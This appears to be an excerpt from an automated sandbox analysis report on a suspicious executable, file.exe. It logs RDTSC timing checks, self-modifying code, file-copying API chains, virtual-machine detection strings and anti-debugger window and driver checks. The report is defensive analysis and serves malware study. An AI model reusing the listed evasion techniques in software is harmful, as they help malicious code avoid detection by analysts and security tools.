Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B64F39 second address: B64F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6509E second address: B650C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FB10CD3210Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B650C0 second address: B650D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CBE428Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6550F second address: B65513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B65513 second address: B6553E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB10CBE4295h 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FB10CBE4286h 0x00000015 jns 00007FB10CBE4286h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6AD40 second address: B6AD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6AD44 second address: B6AD49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6AD49 second address: B6AD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jmp 00007FB10CD320FDh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6A9FB second address: B6A9FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6A9FF second address: B6AA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6AA05 second address: B6AA12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007FB10CBE4286h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B72B79 second address: B72B7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B72B7F second address: B72B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jc 00007FB10CBE4286h 0x00000016 ja 00007FB10CBE4286h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B72B9D second address: B72BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FB10CD32102h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B75849 second address: B75862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007FB10CBE4291h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7BEA7 second address: B7BED7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB10CD32105h 0x0000000e jmp 00007FB10CD32101h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7BED7 second address: B7BF08 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB10CBE428Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d je 00007FB10CBE4286h 0x00000013 ja 00007FB10CBE4286h 0x00000019 jmp 00007FB10CBE428Fh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7BF08 second address: B7BF0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7BF0E second address: B7BF14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7BD2E second address: B7BD3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FB10CD320F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7BD3C second address: B7BD40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7BD40 second address: B7BD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7E4FA second address: B7E531 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB10CBE428Bh 0x0000000f push esi 0x00000010 jmp 00007FB10CBE4299h 0x00000015 pop esi 0x00000016 popad 0x00000017 push edi 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8CA88 second address: B8CAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB10CD320FDh 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FB10CD320F6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8CAA4 second address: B8CAB7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB10CBE4286h 0x00000008 jns 00007FB10CBE4286h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA38E0 second address: BA38E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA3A20 second address: BA3A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA3A26 second address: BA3A44 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB10CD320F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007FB10CD320F6h 0x00000011 je 00007FB10CD320F6h 0x00000017 jnc 00007FB10CD320F6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA3A44 second address: BA3A56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE428Bh 0x00000007 push esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA3B8C second address: BA3B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA3D05 second address: BA3D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA576E second address: BA5779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB10CD320F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA5779 second address: BA57A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE4296h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB10CBE428Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA57A3 second address: BA57A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA57A9 second address: BA57AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA6E3C second address: BA6E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB10CD320F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA9C2F second address: BA9C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BA03E0 second address: 4BA0405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB10CD320FDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BA0405 second address: 4BA043D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 56h 0x00000005 movzx ecx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB10CBE4292h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB10CBE4297h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BA043D second address: 4BA0444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABA5C0 second address: ABA5C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABA924 second address: ABA928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ABA928 second address: ABA92E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 90F8DB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: AADFC5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 90D6A6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 90F9D8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B38FAD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-26972)
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-25790)
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.7 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006D18A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D3910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D1269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D1250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006DE210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006D4B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D4B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006DCBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006D23A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006CDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006CDB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006CDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006CDB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_006D2390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_006DDD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DD530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006C16A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006C16B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_006E1BF0
              Source: file.exe, file.exe, 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2222214050.0000000000F45000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25777
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25785
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25630
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25673
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25649
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
